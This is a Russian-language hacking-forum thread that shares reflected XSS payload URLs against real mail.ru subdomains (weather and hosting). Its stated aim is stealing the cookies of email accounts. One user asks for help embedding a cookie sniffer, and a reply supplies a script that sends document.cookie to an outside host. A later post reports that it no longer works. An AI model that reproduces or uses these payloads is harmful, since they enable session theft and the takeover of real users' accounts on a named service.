- Автор темы
- Добавить закладку
- #21
Padonakdsd
Ну это все XSS. Их все в паблик можно.
Ну это все XSS. Их все в паблик можно.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Уязвимости: mail.ru
- Автор темы Winux
- Дата начала
Ок, еще скину
И еще скрипт, который приводит к ошибке сервера
Код:
http://weather.mail.ru/?curort_2=1&code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru/?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru:8080/index.html?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru:8080/?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22&curort_2=1
http://weather.mail.ru:8080/?curort_2=1&code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru:8080/?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru:8081/?curort_2=1&code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
http://weather.mail.ru:8081/?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22&curort_2=1
http://weather.mail.ru:8081/?code=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22
Код:
http://weather.mail.ru:8080/index10.html?code=1'возможности кражи cookie-файлов
http://hosting.mail.ru/Login.jsp.
Поле "login". Возможна кража куков e-mail аккаунта.
Пример:
http://hosting.mail.ru/Login.jsp.
Поле "login". Возможна кража куков e-mail аккаунта.
Пример:
Код:
http://hosting.mail.ru/Login.jsp?login=%22%3E%3Cscript%3Ealert(%22XSS\r\n
Finded%20by%20nibble\r\nhttp://www.usatikov.com%22)%3C/script%3E
%3Cinput%20type=%22hidden
Помогите встроить в ссылку на скрипт:
ссылку на снифер
Думаю вы меня поймёте!
Код:
http://hosting.mail.ru/Login.jsp?login=%22%3E%3Cscript%3Ealert(%22XSS\r\n
Finded%20by%20nibble\r\nhttp://www.usatikov.com%22)%3C/script%3E
%3Cinput%20type=%22hidden
Код:
<script>img=new Image(); img.src="http://s.netsec.ru/nmb795/pic.gif?;"+document.cookie;</script>- Автор темы
- Добавить закладку
- #25
Пжалст, тока это больше не пашет:
Код:
http://hosting.mail.ru/Login.jsp?login=%22%3E%3Cscript%3Eimg=new Image();
img.src="http://s.netsec.ru/nmb795/pic.gif?;"+document.cookie;%3C/script
%3E%3Cinput%20type=%22hiddenСпасибо!Жаль только не работает